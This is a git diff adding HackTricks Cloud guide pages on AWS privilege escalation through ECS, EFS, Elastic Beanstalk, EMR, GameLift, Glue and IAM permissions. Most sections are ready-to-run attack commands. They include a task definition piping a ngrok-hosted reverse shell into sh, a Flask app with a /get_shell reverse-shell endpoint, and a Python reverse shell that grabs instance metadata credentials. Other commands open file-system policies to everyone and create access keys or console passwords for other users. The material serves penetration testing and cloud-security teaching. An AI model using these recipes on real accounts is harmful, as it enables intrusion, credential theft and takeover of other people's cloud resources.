`ec2:RunInstances` + +Check in the **ec2 privesc page** how you can abuse these permissions to **privesc to ECS**: + +{% content-ref url="aws-ec2-privesc.md" %} +[aws-ec2-privesc.md](aws-ec2-privesc.md) +{% endcontent-ref %} + +### `?ecs:RegisterContainerInstance` + +TODO: Is it possible to register an instance from a different AWS account so tasks are run under machines controlled by the attacker?? 
+ +### `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, `ecs:DescribeTaskSets` + +{% hint style="info" %} +TODO: Test this +{% endhint %} + +An attacker with the permissions `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, and `ecs:DescribeTaskSets` can **create a malicious task set for an existing ECS service and update the primary task set**. This allows the attacker to **execute arbitrary code within the service**. + +```bash +bashCopy code# Register a task definition with a reverse shell +echo '{ + "family": "malicious-task", + "containerDefinitions": [ + { + "name": "malicious-container", + "image": "alpine", + "command": [ + "sh", + "-c", + "apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh" + ] + } + ] +}' > malicious-task-definition.json + +aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json + +# Create a malicious task set for the existing service +aws ecs create-task-set --cluster existing-cluster --service existing-service --task-definition malicious-task --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}" + +# Update the primary task set for the service +aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id +``` + +**Potential Impact**: Execute arbitrary code in the affected service, potentially impacting its functionality or exfiltrating sensitive data. 
+ +## References + +* [https://ruse.tech/blogs/ecs-attack-methods](https://ruse.tech/blogs/ecs-attack-methods) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md new file mode 100644 index 0000000000..566ce8d052 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md @@ -0,0 +1,122 @@ +# AWS - EFS Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## EFS + +More **info about EFS** in: + +{% content-ref url="../aws-services/aws-efs-enum.md" %} +[aws-efs-enum.md](../aws-services/aws-efs-enum.md) +{% endcontent-ref %} + +Remember that in order to mount an EFS you need to be in a subnetwork where the EFS is exposed and have access to it (security groups). Is this is happening, by default, you will always be able to mount it, however, if it's protected by IAM policies you need to have the extra permissions mentioned here to access it. + +### `elasticfilesystem:DeleteFileSystemPolicy`|`elasticfilesystem:PutFileSystemPolicy` + +With any of those permissions an attacker can **change the file system policy** to **give you access** to it, or to just **delete it** so the **default access** is granted. + +To delete the policy: + +```bash +aws efs delete-file-system-policy \ + --file-system-id +``` + +To change it: + +```json +aws efs put-file-system-policy --file-system-id --policy file:///tmp/policy.json + +// Give everyone trying to mount it read, write and root access +// policy.json: +{ + "Version": "2012-10-17", + "Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763", + "Statement": [ + { + "Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": [ + "elasticfilesystem:ClientRootAccess", + "elasticfilesystem:ClientWrite", + "elasticfilesystem:ClientMount" + ], + "Condition": { + "Bool": { + "elasticfilesystem:AccessedViaMountTarget": "true" + } + } + } + ] +} +``` + +### `elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)` + +With this permission an attacker will be able to **mount the EFS**. If the write permission is not given by default to everyone that can mount the EFS, he will have only **read access**. 
+ +```bash +sudo mkdir /efs +sudo mount -t efs -o tls,iam :/ /efs/ +``` + +The extra permissions`elasticfilesystem:ClientRootAccess` and `elasticfilesystem:ClientWrite` can be used to **write** inside the filesystem after it's mounted and to **access** that file system **as root**. + +**Potential Impact:** Indirect privesc by locating sensitive information in the file system. + +### `elasticfilesystem:CreateMountTarget` + +If you an attacker is inside a **subnetwork** where **no mount target** of the EFS exists. He could just **create one in his subnet** with this privilege: + +```bash +# You need to indicate security groups that will grant the user access to port 2049 +aws efs create-mount-target --file-system-id \ + --subnet-id \ + --security-groups +``` + +**Potential Impact:** Indirect privesc by locating sensitive information in the file system. + +### `elasticfilesystem:ModifyMountTargetSecurityGroups` + +In a scenario where an attacker finds that the EFS has mount target in his subnetwork but **no security group is allowing the traffic**, he could just **change that modifying the selected security groups**: + +```bash +aws efs modify-mount-target-security-groups \ + --mount-target-id \ + --security-groups +``` + +**Potential Impact:** Indirect privesc by locating sensitive information in the file system. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md new file mode 100644 index 0000000000..fc4a278bfe --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md @@ -0,0 +1,218 @@ +# AWS - Elastic Beanstalk Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Elastic Beanstalk + +More **info about Elastic Beanstalk** in: + +{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %} +[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md) +{% endcontent-ref %} + +{% hint style="warning" %} +In order to perform sensitive actions in Beanstalk you will need to have a **lot of sensitive permissions in a lot of different services**. You can check for example the permissions given to **`arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk`** +{% endhint %} + +### `elasticbeanstalk:RebuildEnvironment`, S3 write permissions & many others + +With **write permissions over the S3 bucket** containing the **code** of the environment and permissions to **rebuild** the application (it's needed `elasticbeanstalk:RebuildEnvironment` and a few more related to `S3` , `EC2` and `Cloudformation`), you can **modify** the **code**, **rebuild** the app and the next time you access the app it will **execute your new code**, allowing the attacker to compromise the application and the IAM role credentials of it. + +{% code overflow="wrap" %} +```bash +# Create folder +mkdir elasticbeanstalk-eu-west-1-947247140022 +cd elasticbeanstalk-eu-west-1-947247140022 +# Download code +aws s3 sync s3://elasticbeanstalk-eu-west-1-947247140022 . +# Change code +unzip 1692777270420-aws-flask-app.zip +zip 1692777270420-aws-flask-app.zip +# Upload code +aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip +# Rebuild env +aws elasticbeanstalk rebuild-environment --environment-name "env-name" +``` +{% endcode %} + +### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`, and more... 
+ +The mentioned plus several **`S3`**, **`EC2`, `cloudformation`** ,**`autoscaling`** and **`elasticloadbalancing`** permissions are the necessary to create a raw Elastic Beanstalk scenario from scratch. + +* Create an AWS Elastic Beanstalk application: + +```bash +aws elasticbeanstalk create-application --application-name MyApp +``` + +* Create an AWS Elastic Beanstalk environment ([**supported platforms**](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)): + +{% code overflow="wrap" %} +```bash +aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role +``` +{% endcode %} + +If an environment is already created and you **don't want to create a new one**, you could just **update** the existent one. + +* Package your application code and dependencies into a ZIP file: + +```python +zip -r MyApp.zip . 
+``` + +* Upload the ZIP file to an S3 bucket: + +```python +aws s3 cp MyApp.zip s3://elasticbeanstalk--/MyApp.zip +``` + +* Create an AWS Elastic Beanstalk application version: + +{% code overflow="wrap" %} +```css +aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk--",S3Key="MyApp.zip" +``` +{% endcode %} + +* Deploy the application version to your AWS Elastic Beanstalk environment: + +{% code overflow="wrap" %} +```bash +aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0 +``` +{% endcode %} + +### `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `cloudformation:GetTemplate`, `cloudformation:DescribeStackResources`, `cloudformation:DescribeStackResource`, `autoscaling:DescribeAutoScalingGroups`, `autoscaling:SuspendProcesses`, `autoscaling:SuspendProcesses` + +First of all you need to create a **legit Beanstalk environment** with the **code** you would like to run in the **victim** following the **previous steps**. 
Potentially a simple **zip** containing these **2 files**: + +{% tabs %} +{% tab title="application.py" %} +```python +from flask import Flask, request, jsonify +import subprocess,os, socket + +application = Flask(__name__) + +@application.errorhandler(404) +def page_not_found(e): + return jsonify('404') + +@application.route("/") +def index(): + return jsonify('Welcome!') + + +@application.route("/get_shell") +def search(): + host=request.args.get('host') + port=request.args.get('port') + if host and port: + s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.connect((host,int(port))) + os.dup2(s.fileno(),0) + os.dup2(s.fileno(),1) + os.dup2(s.fileno(),2) + p=subprocess.call(["/bin/sh","-i"]) + return jsonify('done') + +if __name__=="__main__": + application.run() +``` +{% endtab %} + +{% tab title="requirements.txt" %} +``` +click==7.1.2 +Flask==1.1.2 +itsdangerous==1.1.0 +Jinja2==2.11.3 +MarkupSafe==1.1.1 +Werkzeug==1.0.1 +``` +{% endtab %} +{% endtabs %} + +Once you have **your own Beanstalk env running** your rev shell, it's time to **migrate** it to the **victims** env. 
To so so you need to **update the Bucket Policy** of your beanstalk S3 bucket so the **victim can access it** (Note that this will **open** the Bucket to **EVERYONE**): + +```json +{ + "Version": "2008-10-17", + "Statement": [ + { + "Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": [ + "s3:ListBucket", + "s3:ListBucketVersions", + "s3:GetObject", + "s3:GetObjectVersion", + "s3:*" + ], + "Resource": [ + "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022", + "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*" + ] + }, + { + "Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b", + "Effect": "Deny", + "Principal": { + "AWS": "*" + }, + "Action": "s3:DeleteBucket", + "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022" + } + ] +} +``` + +{% code overflow="wrap" %} +```bash +# Use a new --version-label +# Use the bucket from your own account +aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-2.0 --source-bundle S3Bucket="elasticbeanstalk--",S3Key="revshell.zip" + +# These step needs the extra permissions +aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0 + +# To get your rev shell just access the exposed web URL with params such as: +http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528 + +Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance). 
+ +The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections. +``` +{% endcode %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md new file mode 100644 index 0000000000..acad83823e --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md @@ -0,0 +1,92 @@ +# AWS - EMR Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## EMR + +More **info about EMR** in: + +{% content-ref url="../aws-services/aws-emr-enum.md" %} +[aws-emr-enum.md](../aws-services/aws-emr-enum.md) +{% endcontent-ref %} + +### `iam:PassRole`, `elasticmapreduce:RunJobFlow` + +An attacker with these permissions can **run a new EMR cluster attaching EC2 roles** and try to steal its credentials.\ +Note that in order to do this you would need to **know some ssh priv key imported in the account** or to import one, and be able to **open port 22 in the master node** (you might be able to do this with the attributes `EmrManagedMasterSecurityGroup` and/or `ServiceAccessSecurityGroup` inside `--ec2-attributes`). + +```bash +# Import EC2 ssh key (you will need extra permissions for this) +ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N "" +chmod 400 /tmp/sshkey +base64 /tmp/sshkey.pub > /tmp/pub.key +aws ec2 import-key-pair \ + --key-name "privesc" \ + --public-key-material file:///tmp/pub.key + + +aws emr create-cluster \ + --release-label emr-5.15.0 \ + --instance-type m4.large \ + --instance-count 1 \ + --service-role EMR_DefaultRole \ + --ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc + +# Wait 1min and connect via ssh to an EC2 instance of the cluster) +aws emr describe-cluster --cluster-id +# In MasterPublicDnsName you can find the DNS to connect to the master instance +## You cna also get this info listing EC2 instances +``` + +Note how an **EMR role** is specified in `--service-role` and a **ec2 role** is specified in `--ec2-attributes` inside `InstanceProfile`. However, this technique only allows to steal the EC2 role credentials (as you will connect via ssh) but no the EMR IAM Role. + +**Potential Impact:** Privesc to the EC2 service role specified. 
+ +### `elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole` + +With these permissions an attacker can go to the **AWS console**, create a Notebook and access it to steal the IAM Role. + +{% hint style="danger" %} +Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related. +{% endhint %} + +**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile + +### `elasticmapreduce:OpenEditorInConsole` + +Just with this permission an attacker will be able to access the **Jupyter Notebook and steal the IAM role** associated to it.\ +The URL of the notebook is `https://.emrnotebooks-prod.eu-west-1.amazonaws.com//lab/` + +{% hint style="danger" %} +Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related`.` +{% endhint %} + +**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md new file mode 100644 index 0000000000..77979f8054 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md @@ -0,0 +1,44 @@ +# AWS - Gamelift + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### `gamelift:RequestUploadCredentials` + +With this permission an attacker can retrieve a **fresh set of credentials for use when uploading** a new set of game build files to Amazon GameLift's Amazon S3. It'll return **S3 upload credentials**. + +```bash +aws gamelift request-upload-credentials \ + --build-id build-a1b2c3d4-5678-90ab-cdef-EXAMPLE11111 +``` + +## References + +* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md new file mode 100644 index 0000000000..29164911df --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md @@ -0,0 +1,118 @@ +# AWS - Glue Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## glue + +### `iam:PassRole`, `glue:CreateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`) + +Users with these permissions can **set up a new AWS Glue development endpoint**, **assigning an existing service role assumable by Glue** with specific permissions to this endpoint. + +After the setup, the **attacker can SSH into the endpoint's instance**, and steal the IAM credentials of the assigned role: + +```bash +# Create endpoint +aws glue create-dev-endpoint --endpoint-name \ + --role-arn \ + --public-key file:///ssh/key.pub + +# Get the public address of the instance +## You could also use get-dev-endpoints +aws glue get-dev-endpoint --endpoint-name privesctest + +# SSH with the glue user +ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com +``` + +For stealth purpose, it's recommended to use the IAM credentials from inside the Glue virtual machine. + +**Potential Impact:** Privesc to the glue service role specified. + +### `glue:UpdateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`) + +Users with this permission can **alter an existing Glue development** endpoint's SSH key, **enabling SSH access to it**. This allows the attacker to execute commands with the privileges of the endpoint's attached role: + +```bash +# Change public key to connect +aws glue --endpoint-name target_endpoint \ + --public-key file:///ssh/key.pub + +# Get the public address of the instance +## You could also use get-dev-endpoints +aws glue get-dev-endpoint --endpoint-name privesctest + +# SSH with the glue user +ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com +``` + +**Potential Impact:** Privesc to the glue service role used. 
+ +### `iam:PassRole`, (`glue:CreateJob` | `glue:UpdateJob`), (`glue:StartJobRun` | `glue:CreateTrigger`) + +Users with **`iam:PassRole`** combined with either **`glue:CreateJob` or `glue:UpdateJob`**, and either **`glue:StartJobRun` or `glue:CreateTrigger`** can **create or update an AWS Glue job**, attaching any **Glue service account**, and initiate the job's execution. The job's capabilities include running arbitrary Python code, which can be exploited to establish a reverse shell. This reverse shell can then be utilized to exfiltrate the **IAM credential**s of the role attached to the Glue job, leading to potential unauthorized access or actions based on the permissions of that role: + +```bash +# Content of the python script saved in s3: +#import socket,subprocess,os +#s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +#s.connect(("2.tcp.ngrok.io",11216)) +#os.dup2(s.fileno(),0) +#os.dup2(s.fileno(),1) +#os.dup2(s.fileno(),2) +#p=subprocess.call(["/bin/sh","-i"]) +#To get the IAM Role creds run: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy + + +# A Glue role with admin access was created +aws glue create-job \ + --name privesctest \ + --role arn:aws:iam::93424712358:role/GlueAdmin \ + --command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}' + +# You can directly start the job +aws glue start-job-run --job-name privesctest +# Or you can create a trigger to start it +aws glue create-trigger --name triggerprivesc --type SCHEDULED \ + --actions '[{"JobName": "privesctest"}]' --start-on-creation \ + --schedule "0/5 * * * * *" #Every 5mins, feel free to change +``` + +**Potential Impact:** Privesc to the glue service role specified. + +### `glue:UpdateJob` + +Just with the update permission an attacked could steal the IAM Credentials of the already attached role. + +**Potential Impact:** Privesc to the glue service role attached. 
+ +## References + +* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md new file mode 100644 index 0000000000..bc19f13410 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md @@ -0,0 +1,314 @@ +# AWS - IAM Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## IAM + +For more info about IAM check: + +{% content-ref url="../aws-services/aws-iam-enum.md" %} +[aws-iam-enum.md](../aws-services/aws-iam-enum.md) +{% endcontent-ref %} + +### **`iam:CreatePolicyVersion`** + +Grants the ability to create a new IAM policy version, bypassing the need for `iam:SetDefaultPolicyVersion` permission by using the `--set-as-default` flag. This enables defining custom permissions. + +**Exploit Command:** + +```bash +aws iam create-policy-version --policy-arn \ + --policy-document file:///path/to/administrator/policy.json --set-as-default +``` + +**Impact:** Directly escalates privileges by allowing any action on any resource. + +### **`iam:SetDefaultPolicyVersion`** + +Allows changing the default version of an IAM policy to another existing version, potentially escalating privileges if the new version has more permissions. + +**Bash Command:** + +```bash +aws iam set-default-policy-version --policy-arn --version-id v2 +``` + +**Impact:** Indirect privilege escalation by enabling more permissions. + +### **`iam:CreateAccessKey`** + +Enables creating access key ID and secret access key for another user, leading to potential privilege escalation. + +**Exploit:** + +```bash +aws iam create-access-key --user-name +``` + +**Impact:** Direct privilege escalation by assuming another user's extended permissions. + +### **`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`** + +Permits creating or updating a login profile, including setting passwords for AWS console login, leading to direct privilege escalation. + +**Exploit for Creation:** + +```bash +aws iam create-login-profile --user-name target_user --no-password-reset-required \ + --password '' +``` + +**Exploit for Update:** + +```bash +aws iam update-login-profile --user-name target_user --no-password-reset-required \ + --password '' +``` + +**Impact:** Direct privilege escalation by logging in as "any" user. 
